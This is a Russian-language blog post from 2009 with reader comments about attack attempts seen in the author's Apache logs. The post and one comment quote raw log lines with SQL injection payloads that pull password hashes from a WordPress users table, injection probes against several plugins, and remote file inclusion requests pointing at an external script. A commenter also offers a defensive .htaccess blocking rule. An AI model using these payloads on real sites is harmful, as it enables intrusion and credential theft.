Авг
24
Наконец-то отошел от летних отпусков. 🙂
Разглядываю такой логи доступа и ошибок апача, и натыкаюсь вот на такую вот вещь.
…
66.63.167.50 - - [23/Aug/2009:06:48:48 -0700] "POST /wp-trackback.php?tb_id=1 HTTP/1.1" 200 376 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:48:48 -0700] "POST /xmlrpc.php HTTP/1.1" 200 7463 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:48:49 -0700] "GET /xmlrpc.php HTTP/1.1" 200 242 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:48:49 -0700] "POST /xmlrpc.php HTTP/1.1" 200 593 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
....
66.63.167.50 - - [23/Aug/2009:06:49:10 -0700] "GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 503 532 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:49:10 -0700] "GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1" 503 532 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:49:10 -0700] "GET / HTTP/1.1" 200 78085 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:49:11 -0700] "GET /youtube-view HTTP/1.1" 200 59811 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:49:00 -0700] "POST /xmlrpc.php HTTP/1.1" 200 593 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:49:12 -0700] "GET /about HTTP/1.1" 200 58090 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:49:14 -0700] "GET /wp-content/plugins/wp-cal/functions/editevent.php?id=-1' HTTP/1.1" 200 58470 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:49:15 -0700] "GET /wp-content/plugins/fgallery/fim_rss.php?album=-1' HTTP/1.1" 200 58358 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:49:16 -0700] "GET /wp-content/plugins/wp-adserve/adclick.php?id=-1+union+select+0x6875616B HTTP/1.1" 200 58307 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:49:17 -0700] "GET /wp-content/plugins/wassup/spy.php?to_date=to_date HTTP/1.1" 503 532 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:49:17 -0700] "GET /wp-content/plugins/wordspew/wordspew-rss.php?id=id' HTTP/1.1" 200 58216 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
66.63.167.50 - - [23/Aug/2009:06:49:17 -0700] "GET /wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1' HTTP/1.1" 200 58192 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
......
211.206.123.177 - - [23/Aug/2009:17:48:23 -0700] "GET /748-transliteraciya-rus-2-lat-na-c//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/fx29id2.txt?? HTTP/1.1" 503 532 "-" "Mozilla/5.0"
211.206.123.177 - - [23/Aug/2009:17:48:23 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/fx29id2.txt?? HTTP/1.1" 503 532 "-" "Mozilla/5.0"
...
Прощупывают слабые места… Один богатырь учит SQL инъекции, другой вообще мир обмануть хочет. Вот козлы!
Скрипт fx29id2 какой-то интересный, собирает наверно очень интересную информацию. Интересно, что автор хотел этим сказать…
Похожие статьи
- Нет похожих статей.
6 сентября, 2009 at 7:12
RewriteEngine On
RewriteCond %{QUERY_STRING} [^?]*\? [OR]
RewriteCond %{QUERY_STRING} (\.\./|\.\.\\) [OR]
RewriteCond %{QUERY_STRING} (///) [OR]
RewriteCond %{THE_REQUEST} «^(GET|POST) /?https?:» [OR]
RewriteCond %{THE_REQUEST} «^(GET|POST|HEAD) //»
RewriteRule (.*) $1 [F]
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
6 сентября, 2009 at 8:46
Спасиб, попробую.
20 сентября, 2009 at 11:57
А у вас движок на сайте word press? Что — то дыр в нем в чистом вообще страшно. Мне тоже сайт пытались взломать…
22 сентября, 2009 at 22:32
И меня сегодня пытались сломать
/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/*
999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/*
/wp-content/plugins/wp-adserve/adclick.php?id=-1+union+select+0x6875616B
с того же IP 66.63.167.50
23 сентября, 2009 at 18:01
Ммда… В гугле ИП капитально засветился. Ребята явно не ради развлечения это делают…
4 февраля, 2010 at 22:27
Писать можно бесконечно , поэтому просто поблагодарю. Спасибо!